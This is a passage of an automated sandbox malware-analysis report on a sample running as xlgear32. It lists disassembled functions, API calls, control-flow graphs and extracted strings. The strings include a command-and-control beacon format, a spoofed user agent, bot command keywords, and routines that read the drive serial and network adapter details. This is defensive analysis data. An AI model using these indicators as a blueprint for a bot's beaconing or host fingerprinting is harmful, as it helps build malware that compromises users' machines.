118->7 146 2d975b9-2d975c8 call 2da35e6 119->146 147 2d975f8-2d97601 call 2da2f74 119->147 144 2d97979-2d979c1 call 2d9a725 121->144 145 2d97ae7-2d97afb call 2d99003 121->145 122->121 123->116 135 2d97562-2d97583 call 2d9439c 123->135 135->119 156 2d97ab1-2d97ae2 call 2d983ea call 2d933b2 144->156 157 2d979c7-2d979ce 144->157 145->7 146->147 160 2d975ca 146->160 158 2d97738-2d9773b 147->158 159 2d97607-2d9761f call 2da3b4c 147->159 156->145 162 2d979d1-2d979d6 157->162 158->48 171 2d9762b 159->171 172 2d97621-2d97629 call 2d99737 159->172 164 2d975cf-2d975e1 call 2da2850 160->164 162->162 166 2d979d8-2d97a23 call 2d9a725 162->166 174 2d975e3 164->174 175 2d975e6-2d975f6 call 2da35e6 164->175 166->156 180 2d97a29-2d97a2f 166->180 178 2d9762d-2d976cf call 2d9a84f call 2d93863 call 2d95119 call 2d93863 call 2d9aaf5 call 2d9ac0f 171->178 172->178 174->175 175->147 175->164 201 2d976d4-2d976e5 178->201 185 2d97a32-2d97a37 180->185 185->185 187 2d97a39-2d97a74 call 2d9a725 185->187 187->156 193 2d97a76-2d97aaa call 2d9d117 187->193 197 2d97aaf-2d97ab0 193->197 197->156 202 2d976ec-2d97717 Sleep call 2da18f0 201->202 203 2d976e7 call 2d9380b 201->203 207 2d97719-2d97722 call 2d94100 202->207 208 2d97723-2d97731 202->208 203->202 207->208 208->158 210 2d97733 call 2d9380b 208->210 210->158
                                                                          APIs
                                                                          • Sleep.KERNEL32(0000EA60), ref: 02D96708
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D96713
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D96724
                                                                          • InternetOpenA.WININET(?), ref: 02D972B5
                                                                          • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02D972DD
                                                                          • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02D972F5
                                                                          • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02D9730D
                                                                          • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02D97336
                                                                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02D97358
                                                                          • InternetCloseHandle.WININET(00000000), ref: 02D97378
                                                                          • InternetCloseHandle.WININET(00000000), ref: 02D97383
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D973EE
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D973FF
                                                                          • _malloc.LIBCMT ref: 02D97498
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D974AA
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D974B6
                                                                          • _malloc.LIBCMT ref: 02D9758E
                                                                          • _strtok.LIBCMT ref: 02D975BF
                                                                          • _swscanf.LIBCMT ref: 02D975D6
                                                                          • _strtok.LIBCMT ref: 02D975ED
                                                                          • _free.LIBCMT ref: 02D975F9
                                                                          • Sleep.KERNEL32(000007D0), ref: 02D976F1
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D97772
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D97784
                                                                          • _sprintf.LIBCMT ref: 02D97822
                                                                          • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D978E6
                                                                          • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D9791A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                          • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                          • API String ID: 1657546717-1839899575
                                                                          • Opcode ID: c1d8671c50ecf8cda47ab4f56595588e0a79eb9e43d69a87f38b776da53210f7
                                                                          • Instruction ID: af2549c2d1dd84fed8cdfcc338385b2491a3a62c66b5ccd3a62ae88c320bad81
                                                                          • Opcode Fuzzy Hash: c1d8671c50ecf8cda47ab4f56595588e0a79eb9e43d69a87f38b776da53210f7
                                                                          • Instruction Fuzzy Hash: 0C32E172648381DFEB25AB24D814BEBB7E6EF85314F10081DF58A97391EB719D04CB62
                                                                          Function 02D9648B Relevance: 70.2, APIs: 34, Strings: 6, Instructions: 228memorysleeplibraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • RtlInitializeCriticalSection.NTDLL(02DC71E0), ref: 02D964BA
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D964D1
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02D964DA
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D964E9
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02D964EC
                                                                          • GetTickCount.KERNEL32 ref: 02D964F8
                                                                            • Part of subcall function 02D9605A: _malloc.LIBCMT ref: 02D96068
                                                                          • GetVersionExA.KERNEL32(02DC7038), ref: 02D96525
                                                                          • _malloc.LIBCMT ref: 02D96551
                                                                            • Part of subcall function 02DA2FAC: __FF_MSGBANNER.LIBCMT ref: 02DA2FC3
                                                                            • Part of subcall function 02DA2FAC: __NMSG_WRITE.LIBCMT ref: 02DA2FCA
                                                                            • Part of subcall function 02DA2FAC: RtlAllocateHeap.NTDLL(00810000,00000000,00000001), ref: 02DA2FEF
                                                                          • _malloc.LIBCMT ref: 02D96561
                                                                          • _malloc.LIBCMT ref: 02D9656C
                                                                          • _malloc.LIBCMT ref: 02D96577
                                                                          • _malloc.LIBCMT ref: 02D96582
                                                                          • _malloc.LIBCMT ref: 02D9658D
                                                                          • _malloc.LIBCMT ref: 02D96598
                                                                          • _malloc.LIBCMT ref: 02D965A7
                                                                          • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D965BE
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02D965C7
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D965D6
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02D965D9
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D965E4
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02D965E7
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D96621
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D9662E
                                                                          • _malloc.LIBCMT ref: 02D96652
                                                                          • _malloc.LIBCMT ref: 02D96660
                                                                          • _malloc.LIBCMT ref: 02D96667
                                                                          • _malloc.LIBCMT ref: 02D9668D
                                                                          • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D966A0
                                                                          • Sleep.KERNEL32 ref: 02D966AE
                                                                          • _malloc.LIBCMT ref: 02D966BA
                                                                          • _malloc.LIBCMT ref: 02D966C7
                                                                          • Sleep.KERNEL32(0000EA60), ref: 02D96708
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D96713
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D96724
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                          • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat$xq_
                                                                          • API String ID: 4273019447-905009876
                                                                          • Opcode ID: f92b4263aaad7e08b5a315cb86422506ec235a049f441b1d0244e1b5d156ad87
                                                                          • Instruction ID: f732d5fb16db0a56f6fd9cbcef46b3cdc918ef11a95a1daef6912ef3b34237ad
                                                                          • Opcode Fuzzy Hash: f92b4263aaad7e08b5a315cb86422506ec235a049f441b1d0244e1b5d156ad87
                                                                          • Instruction Fuzzy Hash: 5E715CB1D48340EBE7116F75AC59B5BBBE9EF85710F20081AF98597380DBB49C108FA6
                                                                          Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 376 401b4b-401b68 LoadLibraryA 377 401c21-401c25 376->377 378 401b6e-401b7f GetProcAddress 376->378 379 401b85-401b8e 378->379 380 401c18-401c1b FreeLibrary 378->380 381 401b95-401ba5 GetAdaptersInfo 379->381 380->377 382 401ba7-401bb0 381->382 383 401bdb-401be3 381->383 384 401bc1-401bd7 call 403120 call 4018cc 382->384 385 401bb2-401bb6 382->385 386 401be5-401beb call 403106 383->386 387 401bec-401bf0 383->387 384->383 385->383 390 401bb8-401bbf 385->390 386->387 388 401bf2-401bf6 387->388 389 401c15-401c17 387->389 388->389 394 401bf8-401bfb 388->394 389->380 390->384 390->385 396 401c06-401c13 call 4030f8 394->396 397 401bfd-401c03 394->397 396->381 396->389 397->396
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00401B5D
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                          • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                          • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                          • API String ID: 514930453-3667123677
                                                                          • Opcode ID: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                                          • Instruction ID: a9f54c968f2091474e8feb0d981771773be25d9c6ef5ebc30493122ab1168d3f
                                                                          • Opcode Fuzzy Hash: a648eded5dba78bf16f4a137e2c2b6b7b052dc293c02733a72e5b458839b5e0e
                                                                          • Instruction Fuzzy Hash: E821B870904209AEDF219F65C9447EF7FB8EF45345F0440BAE604B62A1E7389A85CB69
                                                                          Function 02D9F9A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 450 2d9f9a7-2d9f9ca LoadLibraryA 451 2d9fa8a-2d9fa91 450->451 452 2d9f9d0-2d9f9de GetProcAddress 450->452 453 2d9fa83-2d9fa84 FreeLibrary 452->453 454 2d9f9e4-2d9f9f4 452->454 453->451 455 2d9f9f6-2d9fa02 GetAdaptersInfo 454->455 456 2d9fa3a-2d9fa42 455->456 457 2d9fa04 455->457 458 2d9fa4b-2d9fa50 456->458 459 2d9fa44-2d9fa4a call 2da37a8 456->459 460 2d9fa06-2d9fa0d 457->460 462 2d9fa7e-2d9fa82 458->462 463 2d9fa52-2d9fa55 458->463 459->458 464 2d9fa0f-2d9fa13 460->464 465 2d9fa17-2d9fa1f 460->465 462->453 463->462 467 2d9fa57-2d9fa5c 463->467 464->460 468 2d9fa15 464->468 469 2d9fa22-2d9fa27 465->469 471 2d9fa69-2d9fa74 call 2da3b4c 467->471 472 2d9fa5e-2d9fa66 467->472 468->456 469->469 470 2d9fa29-2d9fa36 call 2d9f6f6 469->470 470->456 471->462 477 2d9fa76-2d9fa79 471->477 472->471 477->455
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D9F9BD
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D9F9D6
                                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D9F9FB
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 02D9FA84
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                          • API String ID: 514930453-3114217049
                                                                          • Opcode ID: 41cb72c9a5335f2badd0c7b38bbc50e6a35b124e57616e4b429776b07d7d965b
                                                                          • Instruction ID: 641169a3771fd22b480071a84474461ace3541eb50fe987fbb1204f07bac31eb
                                                                          • Opcode Fuzzy Hash: 41cb72c9a5335f2badd0c7b38bbc50e6a35b124e57616e4b429776b07d7d965b
                                                                          • Instruction Fuzzy Hash: 9221B471E08209EFDF11DBA8D890AEEBBB9EF09314F1440AAE545E7751D7708E45CBA0
                                                                          Function 02D9F8A3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 535 2d9f8a3-2d9f8ce CreateFileA 536 2d9f99f-2d9f9a6 535->536 537 2d9f8d4-2d9f8e9 535->537 538 2d9f8ec-2d9f90e DeviceIoControl 537->538 539 2d9f910-2d9f918 538->539 540 2d9f947-2d9f94f 538->540 543 2d9f91a-2d9f91f 539->543 544 2d9f921-2d9f926 539->544 541 2d9f958-2d9f95a 540->541 542 2d9f951-2d9f957 call 2da37a8 540->542 546 2d9f95c-2d9f95f 541->546 547 2d9f995-2d9f99e CloseHandle 541->547 542->541 543->540 544->540 548 2d9f928-2d9f930 544->548 550 2d9f97b-2d9f988 call 2da3b4c 546->550 551 2d9f961-2d9f96a GetLastError 546->551 547->536 552 2d9f933-2d9f938 548->552 550->547 560 2d9f98a-2d9f990 550->560 551->547 553 2d9f96c-2d9f96f 551->553 552->552 555 2d9f93a-2d9f946 call 2d9f6f6 552->555 553->550 556 2d9f971-2d9f978 553->556 555->540 556->550 560->538
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D9F8C2
                                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D9F900
                                                                          • GetLastError.KERNEL32 ref: 02D9F961
                                                                          • CloseHandle.KERNEL32(?), ref: 02D9F998
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 4026078076-1180397377
                                                                          • Opcode ID: 3c91021e8f97879c0222271b8fc6b180d3b81d1c70001ce82605aa5b9d5715d1
                                                                          • Instruction ID: f1378f0f6540067adfe758d2f5ceefe4979ca4eb15a371eccbbe33b859f3f233
                                                                          • Opcode Fuzzy Hash: 3c91021e8f97879c0222271b8fc6b180d3b81d1c70001ce82605aa5b9d5715d1
                                                                          • Instruction Fuzzy Hash: 89317872E0022AFFDF24DF99D894AAEBBB9EB45714F20416AF515A7780D7705E00CB90
                                                                          Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 561 401a4f-401a77 CreateFileA 562 401b45-401b4a 561->562 563 401a7d-401a91 561->563 564 401a98-401ac0 DeviceIoControl 563->564 565 401ac2-401aca 564->565 566 401af3-401afb 564->566 567 401ad4-401ad9 565->567 568 401acc-401ad2 565->568 569 401b04-401b07 566->569 570 401afd-401b03 call 403106 566->570 567->566 574 401adb-401af1 call 403120 call 4018cc 567->574 568->566 572 401b09-401b0c 569->572 573 401b3a-401b44 CloseHandle 569->573 570->569 576 401b27-401b34 call 4030f8 572->576 577 401b0e-401b17 GetLastError 572->577 573->562 574->566 576->564 576->573 577->573 579 401b19-401b1c 577->579 579->576 582 401b1e-401b24 579->582 582->576
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                          • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                          • GetLastError.KERNEL32 ref: 00401B0E
                                                                          • CloseHandle.KERNEL32(?), ref: 00401B3D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 4026078076-1180397377
                                                                          • Opcode ID: 5b2aa4f6f1db506efa266d4c362af4cf52cfeed2701d30c33ae5bfe5944f1550
                                                                          • Instruction ID: ae54cd8959710a424601ffd4623f532e2396a469a493930b182490efebea7a61
                                                                          • Opcode Fuzzy Hash: 5b2aa4f6f1db506efa266d4c362af4cf52cfeed2701d30c33ae5bfe5944f1550
                                                                          • Instruction Fuzzy Hash: 50318D71D01118EECB21EF95CD809EFBBB8EF45750F20807AE514B22A0E7785E45CB98
                                                                          Function 02D91CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105synchronizationCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D91D11
                                                                          • GetLastError.KERNEL32 ref: 02D91D23
                                                                            • Part of subcall function 02D91712: __EH_prolog.LIBCMT ref: 02D91717
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D91D59
                                                                          • GetLastError.KERNEL32 ref: 02D91D6B
                                                                          • __beginthreadex.LIBCMT ref: 02D91DB1
                                                                          • GetLastError.KERNEL32 ref: 02D91DC6
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02D91DDD
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02D91DEC
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D91E14
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02D91E1B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                          • String ID: thread$thread.entry_event$thread.exit_event
                                                                          • API String ID: 831262434-3017686385
                                                                          • Opcode ID: b83257a436d458c41eb07b9da13256ba28461cdefb171d1313db7cac6ddf6b72
                                                                          • Instruction ID: 216189fc85da463c49b6ea3c69ac2f0e785021b41a215e8f1eabaeb0cf984ff0
                                                                          • Opcode Fuzzy Hash: b83257a436d458c41eb07b9da13256ba28461cdefb171d1313db7cac6ddf6b72
                                                                          • Instruction Fuzzy Hash: C3316C71A04302DFEB01EF24C858B2BBBA5FB84754F10496AF95997390DB70DC49CBA2
                                                                          Function 02D94D86 Relevance: 16.8, APIs: 11, Instructions: 256COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D94D8B
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D94DB7
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D94DC3
                                                                            • Part of subcall function 02D94BED: __EH_prolog.LIBCMT ref: 02D94BF2
                                                                            • Part of subcall function 02D94BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D94CF2
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D94E93
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D94E99
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D94EA0
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D94EA6
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D950A7
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D950AD
                                                                          • RtlEnterCriticalSection.NTDLL(02DC71E0), ref: 02D950B8
                                                                          • RtlLeaveCriticalSection.NTDLL(02DC71E0), ref: 02D950C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                          • String ID:
                                                                          • API String ID: 2062355503-0
                                                                          • Opcode ID: e73c6147829c4724a245864c797c67d514ec4809fb5ae869017ddbe0fd8e2f10
                                                                          • Instruction ID: 3a27fb7e1080228b0a63d80fa705a7e5f905b0de4d9dcabead9ac70540aad656
                                                                          • Opcode Fuzzy Hash: e73c6147829c4724a245864c797c67d514ec4809fb5ae869017ddbe0fd8e2f10
                                                                          • Instruction Fuzzy Hash: 23B13871D0025AEFEF21DF90D854BEEBBB9AF04314F20415AE405A6381DB755E49CFA1
                                                                          Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 402 401f64-401f84 FindResourceA 403 401f86-401f9d GetLastError SizeofResource 402->403 404 401f9f-401fa1 402->404 403->404 405 401fa6-401fec LoadResource LockResource GlobalAlloc call 402d60 * 2 403->405 406 402096-40209a 404->406 411 401fee-401ff9 405->411 411->411 412 401ffb-402003 GetTickCount 411->412 413 402032-402038 412->413 414 402005-402007 412->414 415 402053-402083 GlobalAlloc call 401c26 413->415 417 40203a-40204a 413->417 414->415 416 402009-40200f 414->416 422 402088-402093 415->422 416->415 418 402011-402023 416->418 419 40204c 417->419 420 40204e-402051 417->420 423 402025 418->423 424 402027-40202a 418->424 419->420 420->415 420->417 422->406 423->424 424->418 425 40202c-40202e 424->425 425->416 426 402030 425->426 426->415
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                          • GetLastError.KERNEL32 ref: 00401F86
                                                                          • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                          • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                          • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                          • GetTickCount.KERNEL32 ref: 00401FFB
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                          • String ID:
                                                                          • API String ID: 564119183-0
                                                                          • Opcode ID: 4b406982c55cd146a53e35bcfe0d224a47769fdd51ac53a5645699cce47c5184
                                                                          • Instruction ID: b01298f5e92dfabffd3260d40ec81ee59ee3d80feb476c4020a7475af27d6630
                                                                          • Opcode Fuzzy Hash: 4b406982c55cd146a53e35bcfe0d224a47769fdd51ac53a5645699cce47c5184
                                                                          • Instruction Fuzzy Hash: 60315C32900255EFDB105FB89F8896F7B68EF45344B10807AFA86F7281DA748941C7A8
                                                                          Function 02D926DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02D92706
                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D9272B
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DB5B53), ref: 02D92738
                                                                            • Part of subcall function 02D91712: __EH_prolog.LIBCMT ref: 02D91717
                                                                          • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02D92778
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02D927D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                          • String ID: timer
                                                                          • API String ID: 4293676635-1792073242
                                                                          • Opcode ID: f7777da8583d24cf075b97062341c3a9e3e2d175e81bf62424d2f219b02f291e
                                                                          • Instruction ID: 135a46d2e2adb10dc506c2d95dad5b570e9a7c59a985b3158a9a8154062a7c8a
                                                                          • Opcode Fuzzy Hash: f7777da8583d24cf075b97062341c3a9e3e2d175e81bf62424d2f219b02f291e
                                                                          • Instruction Fuzzy Hash: C0318BB2904706EFD711DF25D948B66BBE8FB48B24F004A2AF85592780D770DC00CBA5
                                                                          Function 02D92B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132networkCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 478 2d92b95-2d92baf 479 2d92bb1-2d92bb9 call 2da0b10 478->479 480 2d92bc7-2d92bcb 478->480 488 2d92bbf-2d92bc2 479->488 482 2d92bcd-2d92bd0 480->482 483 2d92bdf 480->483 482->483 486 2d92bd2-2d92bdd call 2da0b10 482->486 484 2d92be2-2d92c11 WSASetLastError WSARecv call 2d9a509 483->484 490 2d92c16-2d92c1d 484->490 486->488 491 2d92d30 488->491 493 2d92c2c-2d92c32 490->493 494 2d92c1f-2d92c2a call 2da0b10 490->494 495 2d92d32-2d92d38 491->495 497 2d92c34-2d92c39 call 2da0b10 493->497 498 2d92c46-2d92c48 493->498 503 2d92c3f-2d92c42 494->503 497->503 501 2d92c4a-2d92c4d 498->501 502 2d92c4f-2d92c60 call 2da0b10 498->502 505 2d92c66-2d92c69 501->505 502->495 502->505 503->498 508 2d92c6b-2d92c6d 505->508 509 2d92c73-2d92c76 505->509 508->509 510 2d92d22-2d92d2d call 2d91996 508->510 509->491 511 2d92c7c-2d92c9a call 2da0b10 call 2d9166f 509->511 510->491 518 2d92cbc-2d92cfa WSASetLastError select call 2d9a509 511->518 519 2d92c9c-2d92cba call 2da0b10 call 2d9166f 511->519 524 2d92d08 518->524 525 2d92cfc-2d92d06 call 2da0b10 518->525 519->491 519->518 528 2d92d0a-2d92d12 call 2da0b10 524->528 529 2d92d15-2d92d17 524->529 533 2d92d19-2d92d1d 525->533 528->529 529->491 529->533 533->484
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D92BE4
                                                                          • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D92C07
                                                                            • Part of subcall function 02D9A509: WSAGetLastError.WS2_32(00000000,?,?,02D92A51), ref: 02D9A517
                                                                          • WSASetLastError.WS2_32 ref: 02D92CD3
                                                                          • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D92CE7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
